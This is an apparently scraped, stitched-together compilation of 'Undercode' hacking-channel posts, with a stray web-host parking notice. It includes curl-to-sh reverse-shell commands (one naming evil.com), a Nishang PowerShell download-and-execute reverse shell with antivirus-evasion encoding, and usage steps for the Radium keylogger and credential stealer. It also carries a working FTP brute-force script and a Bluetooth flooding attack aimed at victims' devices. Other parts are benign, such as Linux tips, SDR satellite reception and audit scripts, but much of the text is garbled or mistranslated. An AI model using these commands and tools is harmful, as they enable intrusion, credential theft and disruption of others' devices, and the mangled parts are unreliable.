▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Reverse Shell as a Service topic updated
>pinterest.com/Undercode_Testing

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> clone https://github.com/lukechilds/reverse-shell
1) Listen for connection
On your machine, open up a port and listen on it. You can do this easily with netcat.

> nc -l 1337

2) Execute reverse shell on target
On the target machine, pipe the output of https://shell.now.sh/yourip:port into sh.

3) curl https://shell.now.sh/192.168.0.69:1337 | sh

4) Go back to your machine, you should now have a shell prompt.

🦑Hostname

> You can use a hostname instead of an IP.

1) curl https://shell.now.sh/localhost:1337 | sh
Remote connections
Because this is a reverse connection it can punch through firewalls and connect to the internet.

2) You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with.

> curl https://shell.now.sh/evil.com:1337 | sh

3) Reconnecting
By default when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.

while true; do curl https://shell.now.sh/yourip:1337 | sh; done

4) Running as a background process

> Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.

sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Your domain is not pointing to our name servers

Therefore most features (website, e-mail, FTP) will not work. You need to navigate to your domain registrar (the company where you registered your domain) and edit DNS details of your domain. Here are new name servers:

ns1.dns-parking.com
ns2.dns-parking.com

This way, you will be able to take full advantage of all our features. Your domain will display the content uploaded to your account, mail service will be active, you will be able to activate SSL, create subdomains and manage your DNS zone. Domain will become fully functional in a few hours. Global DNS servers have to fetch new domain details first.

In the meantime, use this link to preview your website:
dailycve-com.preview-domain.com
This link will be available for 120h after your account is created

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft finds Google Chrome vulnerability, Google finds Microsoft Edge vulnerability full by underc0de :
>Security is now a powerful difference in picking the right browser. We all use browsers for everyday activities, such as staying in touch with loved ones, editing sensitive private and corporate documents, and even managing our financial assets. A single compromise through a web browser can have disastrous consequences. This does not mean that the browser is also becoming one of the most sophisticated consumer software available, increasing the potential attack surface.
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Find and exploit remote vulnerabilities

> Usually, we do this by discovering memory corruption errors, such as buffer overflows or post-exempt vulnerabilities.

2) As with any web browser, the attack surface is extensive, including the V8 JavaScript interpreter, the Blink DOM engine, and the ium PDF PDF renderer. For this project, we focused on V8 .

3) The bugs we ultimately used for our exploit were discovered through obfuscation. We use the Azure-based fuzzy infrastructure of the Windows Security Assurance team to run ExprGen , an internal JavaScript fuzzer written by the team behind Chakra (our own JavaScript engine). People may have thrown all public fuzzers on V8 ; on the other hand, ExprGen has only operated on Chakra , giving it more opportunities to lead to new bugs.

🦑 1) Recognition error
One disadvantage of obfuscation compared to manual code review is that it is not always immediately clear what causes a given test case to trigger a vulnerability, or unexpected behavior even constitutes a vulnerability.

2) This is especially true for us at OSR; we don't have any experience working with V8 , so little is known about its internal work. In this case, the test cases generated by ExprGen reliably crashed V8 , but not always in the same way, and not in a way that could be easily affected by attackers.

3) Since fuzzers often generate very large and complex code (in this case, nearly 1,500 lines of unreadable JavaScript), the first step is usually to minimize test cases – trimming fat until we leave a small, understandable Code. This is underc0de final conclusion:

>looks weird and doesn't really implement anything, but it is valid JavaScript. All it does is create a weird structured object and then set some of its fields. This should not trigger any strange behavior, but it is. When running this code with D8 , the standalone executable version of V8 is built with git tag 6.1.5534.32 and we will experience a crash

> Looking at the address where the crash occurred ( 0x000002d168004f14 ), we can tell it will not happen in a static module. Therefore, it must be code that is dynamically generated by the V8 Just-In-Time (JIT) compiler. We also see the crash because the rax register is zero.

> looks like a classic zero dereference error, which would be a waiver: usually not exploitable because modern operating systems prevent zero virtual addresses from being mapped

+ Check out picture

> our crash happened before a function call and looked like a JavaScript function dispatcher stub, mainly because the address of v8 :: internal :: Builtin_FunctionPrototypeToString was loaded into a register before the call. Looking at the code located at the function 0x000002d167e84500 , we find that the address 0x000002d167e8455f does contain a call to the RBX instruction, which seems to confirm our suspicion.

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

4) This does not produce very useful information.

5) We can see that most of these values ​​are pointers, but that's about it. However, knowing the location of the value (what does it mean a pointer) is useful because it can help us figure out why this value is zero in the first place. Using WinDbg's new " Time Journey Debugging (TTD)" feature, we can place a memory write breakpoint at this location ( baw 8 0000025e`a6845dd0 ), then place an execution breakpoint at the beginning of the function, and finally Rerun backward tracking ( g- ).

6) Interestingly, our memory write breakpoints are not triggered, which means that this memory slot is not initialized in this function, or at least it will not be used. This may be normal, but if we play with test cases, for example by replacing obbc.bca.bcab = 0; line with obbc.bca.bcab = 0xbadc0de; then we start to notice changes in the memory area where our crash values ​​occur

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 ISSUE 2 IN EXPLORET AND CHROME :-Create Crash for browsers :
At this stage of the optimization process, the code looks perfectly reasonable:

1) Allocate a storage block to store the local object obba (node ​​235), and its fields baa and bab are initialized

2) Allocate a memory block to store the local object ob (node ​​259), and its fields are initialized, where ba is initialized with a reference to the previous obba allocation

3) Allocate a storage block to store the local object o (node ​​303), and its fields are initialized

4) Field b of local object o is covered by a reference to object ob (node ​​185)

5) Local object field obba.bab is loaded (nodes 199, 209 and 212)
Call the Object.toString method, passing obba.bab as the first parameter


6) Code compiled in the optimization pipeline at this stage should not appear to exhibit uninitialized local variable behavior, and we assume this is the root cause of the error.

7) Having said that, some aspects of this representation can prove our hypothesis. Looking at nodes 209 and 212 loading obba and obba.bab as function call parameters, we can see that the offsets +24 and +32 correspond to the disassembly of the crash

8) 0x17 and 0x1f are 23 and 31 , respectively . Considering how the value of the V8 tag distinguishes an actual object from an inline integer (SMI), the value of the VORD tag can be applied: if the value intended to indicate that a JavaScript variable has the least significant bit set, it is treated as a pointer to the object, Otherwise it is SMI. Therefore, V8 code is optimized to subtract one from the JavaScript object offset before it is used for dereferencing

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Those tutorials- crash browsers bug for developers, or hacker with little bit experience-

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW CRASH CODES WORKS IN BROWSERS ?
There are two significant differences:

1) The code no longer has the trouble of loading o , and then ob -it is optimized to directly reference ob , probably because the value of the field has never changed

2) The code no longer initializes obba ; as can be seen in the figure, the turbulence grayscale out of node 264, which means that it no longer lives, so it will not be built into the final code

3) Looking at all active node seems to confirm that this field is no longer initialized. As another sanity check, we run d8 in this test case , using the -no-turbo-escape flag to omit this optimization phase: d8 no longer crashes, confirming that this is the problem.
written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Radium, a keylogger with multiple functions. This tool is written in Python and has many functions as shown below:
twitter.com/undercodenews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1)Application and keylogger

2) Screenshot record

3) Send keyboard records via email

4) Recover password for Chrome, Mozilla, Filezilla, Core FTP, CyberDuck, FTPNavigator, WinSCP, Outlook, Putty, Skype and more

5) Cookie stealing

6) Automatic update function

7) Collect system information, including internal / external IP addresses, Ipconfig and / all output, and platform version.


🦑 Dependent component

1) PyHook

2) PyWin32

3) MicrosoftVisual C ++ Compiler for Python

4) PyInstaller

🦑 Tool use

1) Download dependent libraries

2) Set Gmail email username and password to minimize Gmail security settings to allow all connections;

3) Set up FTP server, including IP, username and password, and the directory where new version of Radium needs to be stored;

4) Remember to use base64 encoding for passwords;

5) Set the originalfilename variable in copytostartup (), which is the name of the exe file;

6) Use Pyinstaller to make exe files;

7) After recording 300 (modifiable) user keystrokes, a keyboard record is automatically sent to the attacker via email;

8) After recording 500 (modifiable) user keystrokes, screenshots will be taken automatically;

9) Remember, when you convert Radium to exe format, you need to modify the originalfilename and coppiedfilename variables in the copytostartup () function.


written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 small list of useful payloads and bypass for Web Application Security and Pentest/CTF
> pinterest.com/Undercode_TESTING

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py

2) Apache Struts 2 CVE-2017-9805.py

3) Apache Struts 2 CVE-2018-11776.py

4) Docker API RCE.py

5) Drupalgeddon2 CVE-2018-7600.rb

6) Heartbleed CVE-2014-0160.py

7) JBoss CVE-2015-7501.py

8) Jenkins CVE-2015-8103.py

9) Jenkins CVE-2016-0792.py

10) Rails CVE-2019-5420.rb

11) Shellshock CVE-2014-6271.py

12) Tomcat CVE-2017-12617.py

13) WebLogic CVE-2016-3510.py

14) WebLogic CVE-2017-10271.py

15) WebLogic CVE-2018-2894.py

16) WebSphere CVE-2015-7450.py


🦑 https://github.com/swisskyrepo/PayloadsAllTheThings


> checked by Underc0de

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Updated > tracking location script :
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowlege, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
pinterest.com/Undercode_testing

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ

1) git clone https://github.com/jofpin/trape.git

2) cd trape

3) python2 trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt

4) python2 -m pip install -r requirements.txt

🦑 Example of execution

5) Example: python2 trape.py --url http://example.com --port 8080

🦑 HELP AND OPTIONS

6) user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-u URL, --url URL Put the web page url to clone
-p PORT, --port PORT Insert your port
-ak ACCESSKEY, --accesskey ACCESSKEY
Insert your custom key access
-l LOCAL, --local LOCAL
Insert your home file
-n, --ngrok Insert your ngrok Authtoken
-ic INJC, --injectcode INJC
Insert your custom REST API path
-ud UPDATE, --update UPDATE
Update trape to the latest version
--url In this option you add the URL you want to clone, which works as a decoy.

--port Here you insert the port, where you are going to run the trape server.

--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.

--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.

--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.

--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.

--version You can see the version number of trape.

--update Option used to upgrade to the latest version of trape.

--help It is used to see all the above options, from the executable.

🦑Tested by UndercOde :

> rooted android 9.0

> ubuntu

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Updated Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ

>clone on Windows https://github.com/samratashok/nishang
1) Import all the scripts in the current PowerShell session (PowerShell v3 onwards).

> PS C:\nishang> Import-Module .\nishang.psm1
Use the individual scripts with dot sourcing.

> PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

> PS C:\nishang> Get-Information

2) To get help about any script or function, use:

> PS C:\nishang> Get-Help [scriptname] -full

> Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.

🦑 For example, to see the help about Get-WLAN-Keys.ps1, use

> PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

> PS C:\nishang> Get-Help Get-WLAN-Keys -Full

🦑Disabling Anti Virus

1) this script scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:

> Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.

2) powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

> Method 2. Use the -encodedcommand (or -e) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

3) Encode the scrript using Invoke-Encode from Nishang:

PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand
Encoded data written to .\encoded.txt

4) Encoded command written to .\encodedcommand.txt

From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:

C:\Users\target> powershell -e [encodedscript]
If the scripts still get detected changing the function and parameter names and removing the help content will help.

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 FTP BRUTEFORCE CODE :
t.me/UndercOdeTesting

function ftpbruter() {

#DEFINA AQUI AS VARIÁVEIS PARA O ATAQUE
$user = 'ftptest';
$host = '192.168.0.102';
$passlist = file_get_contents('passtest.txt');
$port = 21;
$timeout = 50;

$passes = explode("\n", $passlist);
$i = 1;
foreach ($passes as $pass) {
error_reporting(0);
echo "[*] Testando " . $user . " && " . $pass . "\n";
$con = ftp_connect($host, $port, $timeout);
$login = ftp_login($con, $user, $pass);

if (!$login) {
ftp_close($con);
$i++;

} else {
echo "Password encontrado\n";
echo "Efetuadas " . $i . " tentativas\n";
echo "User: " . $user . " Password: " . $pass . "\n";
break;
}
}
}

ftpbruter();

@UndercodeOfficial

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is ftp for beginers:
instagram.com/UndercodeTesting

1) FTP is a way to transfer files online. You might think of the sites you visit in your browser as “the internet,” but your browser only uses one protocol: HTTP.

2) There are many others protocols that, collectively, make up the internet. IMAP and POP, for instance, are two protocols that email clients use to send and receive messages.

3) XMPP is a protocol used to send and receive instant messages. FTP is another such protocol.

4) FTP stands for “File Transfer Protocol.” It’s also one of the oldest protocols in use today, and is a convenient way to move files around. An FTP server offers access to a directory, with sub-directories. Users connect to these servers with an FTP client, a piece of software that lets you download files from the server, as well as upload files to it.

5) Many internet users will never have any use for FTP, but if you’re building a website, it’s an essential tool. And because it’s such a fundamental tool on the web, it’s worth knowing about even if you’re not a developer. So, here’s everything the average internet user needs to know about FTP and how to use it.



@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 This includes both the tricks we talked about earlier and the new ones-linux
instagram.com/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Trick number 1

> $ sudo !!
Runs the previous command with root privileges.

Useful when you forget to write sudo. "!!" he captures the previous line.

2) Trick number 2

$ python -m SimpleHTTPServer
Launches a simple server directly in the Linux console to view the current directory as a web page. You can see it like this:

$ firefox http://$HOSTNAME:8000/

3) Trick number 3
$ ^foo^bar
Runs the previous command, but with a replacement.

It is convenient to apply if you make a typo. By default, the arguments are empty, so by running something like this:

$ echo "no typozs"
can easily fix with

$ ^z

4) Trick number 4
$fc
or

Ctrl + X + E

Opens a text editor to write a long command.

You can write at your discretion in vi, emacs, nano ... The key combination captures the written text and opens it in the editor specified in $ EDITOR.

5) Trick number 5
Alt +. or Esc +.

Inserts the last argument of the previous command. For example, if you wrote:

$ cp file.txt /var/www/proglib/
$ cd
and hit Alt +. then the line will become

$ cd /var/www/proglib/
Repeating this key combination substitutes arguments from older commands.

6) Trick number 6
$ mount | column -t
Lists all connected file systems in human form.

7) Trick number 7
$ echo "ls -l" | at midnight
Executes the given command at the appointed time.


8) Trick number 8
$curl ifconfig.me
Displays the global IP address. Also:

curl ifconfig.me/host -> Remote Host
curl ifconfig.me/ua ->User Agent
curl ifconfig.me/port -> Port
This works thanks to the ifconfig.me site.

9) Trick number 9
$ man ascii
Allows you to quickly see the Ascii character table.

10) Trick number 10
$ mount -t tmpfs tmpfs /mnt -o size=1024m
Mounts part of the RAM as a temporary partition in / mnt. Surely there is no point explaining the benefits of using RAM. Data will be saved until the next reboot or until

$ umount /mnt

11) Trick number 11
Ctrl-l

Just clears the terminal.

12) Trick number 12
$ disown -a && exit
Closes the terminal, leaving all running subprocesses to work.

13) Trick number 13
$ mv filename.{old,new}
A quick way to rename a file

14) Trick number 14
$ pushd /tmp
Adds a directory to the stack to return to the current one afterwards. For instance:

$ cd /complicated/path/.I/dont/want/to/forget
$ pushd /tmp
$ cd thing/in/tmp
$ popd
You are back on horseback in /complicated/path/.I/dont/want/to/forget.

15) Trick number 15
$ rm !(*.foo|*.bar|*.baz)
Deletes all files that do not have the specified extension.

16) Trick number 16
And finally:

$ telnet towel.blinkenlights.nl

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 buetooth hack :

> If modern Wi-Fi routers are capable of filtering out unwanted packets, then most Bluetooth adapters are, to say the least, blunt. By and large, they do not care what package and how much, and even more so how many of these packages you send.

> Therefore, it is absolutely easy for us to increase the information volume of the ping package in Linux to a huge value, and then send these packages to the device with Bluetooth, say, 1000 pieces.

> Now in order. First we need to find the right devices in range. To do this, use those command :
pinterest.com/UndercOde_testing

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) $ hcitool scan
As a result of this simple manipulation, you will get a list of available devices with Bluetooth from their MAC address. If your system does not see the Bluetooth adapter, then I recommend installing one of the Bluetooth managers for Linux. In Kali, gnome-bluetooth approached me personally, which can be installed with the following command:

2) $ apt-get install gnome-bluetooth
You can also use the blueman utility:

3) $ apt-get install blueman
Having received a list of potential victims, you can deal with their blue-tooth devices in several ways. Let's consider each separately.


4) The first way: l2ping
We use the following command:

> $ l2ping -i hci0 -s <packet value> -f <MAC_address>

5) It will generate packets specified by you in the <packet value>volume parameter and will send these packets to the MAC address recorded as a parameter <MAC_address>. In the end, you will see this picture: in the terminal, the response time will gradually increase, and on the attacked device, most likely, Bluetooth will simply turn off. After some time, it will turn on anyway, but the music will be interrupted, and some satisfaction will be received.

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Satellite Hacking by Underc0de :
fb.com/UndercOdetesting
1) Today I will show how to receive and decode signals from space. Not, of course, as contactees and fans of caps made of foil do, but in all seriousness.

2) the so-called L-Band - a frequency range from 1 to 2 GHz, which is actively used for communication with satellites.

3) Reception of the L-Band range is not something radically new for hams. But before it was not easy. It was necessary to calculate and make an antenna, solder a low-noise amplifier (because the signals from the satellite are very weak), then set it all up. In addition, the devices for this lesson cost a lot of money.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Now everything has become much simpler and cheaper: you can meet the $ 100 per antenna with the receiver. As for the satellites themselves, we will consider two systems: Iridium and Inmarsat . They are interesting in that they are existing communication systems and you can “live” see how they work. Moreover, for these systems there are software decoders that you can run, study the sources on GitHub.


2) Iron
A kit for receiving satellite signals consists of three main components: a receiver, an antenna, and a low noise amplifier (LNA, Low Noise Amplifier).


3) Receiver
Let's start with the receiver. There are three main options.

🦑 Option 1 - RTL-SDR V3
This is a classic of the genre, one of the best and proven low-cost receivers based on the famous RTL-SDR. The receiver provides operation at frequencies up to 1.7 GHz and a 2 MHz bandwidth. The price of the receiver is about $ 30, along with an antenna and a mini tripod (it is also useful on the farm).

RTL-SDR V3
RTL-SDR V3

> It is important to take the original model: AliExpress has cheaper clones, but, firstly, their quality is not guaranteed, and secondly, the receiver must have the ability to supply power to the antenna input (bias tee), otherwise it won’t work.

🦑 Option 2: Nooelec NESDR SMArTee v2
This receiver is approximately comparable in characteristics to the previous one, it has a non-disconnectable bias tee, and for satellite reception it can be convenient. It is advisable to choose the second version, because the first has a lower maximum output current (250 mA versus 100). This is important: some LNAs (e.g. Nooelec SAWbird) consume about 180 mA.

NESDR SMArTee v2
NESDR SMArTee v2
There is another model Nooelec NESDR SMArt, without Tee in the name, it does not fit.

🦑 Option 3 - SDRplay RSPduo
This is a better receiver, which provides a reception bandwidth of up to 8 MHz, which is much more convenient for signal search. The ADC itself also has a large bit depth (12 bits instead of 8), which is better for receiving weak signals.

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Security Express Audit Scripts for Linux (ITGC)
Verification of accounts
twitter.com/Undercodenews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) List all users.
The user list is stored in the / etc / passwdfile file. To get a list of users, you can use the following script:

bin / bash
# userslistinthesystem.sh
# count and Lists existing “real” users in the system.
echo
echo “[*] Existing users (sorted alphabetically):”
echo
grep '/ bin / bash' / etc / passwd | grep -v 'root' | cut -f1
-d ':' | sort
echo
echo -n “[*] Number of real users found:“
grep '/ bin / bash' / etc / passwd | grep -v 'root' | wc -l
echo

2) List the blocked accounts
During the audit, you need to check the list of blocked and unblocked users ( accountName ). The following command is suitable for this:
#! / bin / bash
echo
# passwd –s accountName

3) View statistics for all users
The auditor must ensure that the ac command is enabled on the system to review user activity:
#! / bin / bash
# ac
To view the activity of a user connection session with totals for each day, use the command:
#! / bin / bash
# ac -d
To display information about the session activity (in hours) of the user connection “user” :
#! / bin / bash
# ac user

4) Viewing user activity
System applications psacct or acct work in the background and track the activity of each user in the system, as well as the resources consumed by him. To check the activity of users in the system, run the following script:
#! / usr / bin / envksh
last -Fa | awk '
/ wtmp begins / {next; }
/ still logged in / {next; }
$ 0 == reboot {next; }
NF> 0 {
if (NR> 1)
printf (“
”);
printf (“User: t% s
”, $ 1); # user
printf (“Start: t% s% s% s% s
”, $ 3, $ 4, $ 5, $ 6);
if ($ 9 == “down”)
printf (“End: tshutdown
”);
else
printf (“End: t% s% s% s% s
”, $ 9, $ 10, $ 11, $ 12);
if ( substr ($ NF, 1, 1) == “(“)
{
t = $ NF;
h = “localhost”;
}
else
{
t = $ (NF-1);
h = $ NF;
}
gsub (“[()]”, “”, t);
printf (“Time On: t% s
”, t);
printf (“Remote Host: t% s
”, h);
} '

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Checking the password policy :

1) Accounts with an empty password
During the audit, you need to make sure that the system does not have or has blocked accounts that allow you to enter the system without entering a password. This rule can be checked with the command:

# cat / etc / shadow | awk -F: ($ 2 == ””) {print $ 1} '

2) Password complexity check
During the audit, it is necessary to check the password complexity settings in order to reduce the risk of password attacks using brute force (brute force) or dictionary matching. To set this rule in the system you must use authentication plugins (PAM).
The auditor can check the corresponding setting in the configuration file:

# vi /etc/pam.d/system-auth

3) Checking the password age
During the audit, you need to check the password expiration setting. To check the password expiration, use the change command . This command displays detailed information about the password expiration date, as well as the date it was last changed.
The following command is used to view information about the “age” of passwords:

#chage -l username

To change the password expiration time for a specific user, use the commands listed below:

#chage -M 60 username
#chage -M 60 -m 7 -W 7 userName

Parameters ( to set the password expiration date):
-M - maximum validity period in days.
-m is the minimum validity in days.
-W - setting the warning in days.

4) Using duplicate passwords
The authorization settings in the system must comply with the password policy. The file containing the password history is located in / etc / security / opasswd. For verification, you must perform the following steps:

for RHEL: open the file '/etc/pam.d/system-auth':

# vi /etc/pam.d/system-auth

for Ubuntu / Debian / Linux Mint: open the file '/ etc /pam.d/common-password ':

# vi /etc/pam.d/common-password

Add the following line to the' auth 'section:

auth sufficient pam_unix.so likeauthnullok

To prevent the last six passwords from being used, add the following line:

Password sufficient pam_unix. so nullokuse_authtok md5 shadow remember = 6

After executing the command, the system will store a history of the previous six passwords, and if any user tries to update the password using any of the last six, he will receive an error message.

5) Secure connection settings
Remote connection protocols to the Telnet and Rlogin system are very old and vulnerable, due to the transmission of the password over the network in unencrypted form. For dedicated and secure connections, the Secure Shell (SSH) protocol must be used . The auditor also needs to make sure that the root login option is disabled, the default SSH port is changed, remote access is allowed only for specific authorized users. Checked settings are located in the SSH configuration file:

> # vi / etc / ssh / sshd_config

6) Logging on as root (root login)

During the audit, the auditor should check the prohibition of remote login with root privileges.

# PermitRootLogin = yes

7) Verification of SSH service account login

During the audit, the auditor should check the service account with a passwordless SSH login value. Typically, system administrators use this feature for programmed backups, transferring files, and running scripts in remote control mode.

Check your sshd_config settings (/ etc / ssh / sshd_config) are correct one last time.

# PermitRootLogin without-password

# RSAAuthentication = yes

# PubkeyAuthentication = yes

8) Checking access lists in Denyhosts and Fail2ban
During the audit, you need to check the settings of the DenyHosts and Fail2ban access lists . These are scripts used to monitor and analyze SSH access logs and to protect against attacks by brute force passwords.

🦑 Features DenyHosts:
saves and tracks the logs from the / var / log / secure file , noting all successful and unsuccessful login attempts, and filters them.
monitors failed login attempts
sends an email notification of blocked hosts and suspicious login attempts

1) Features of Fail2ban: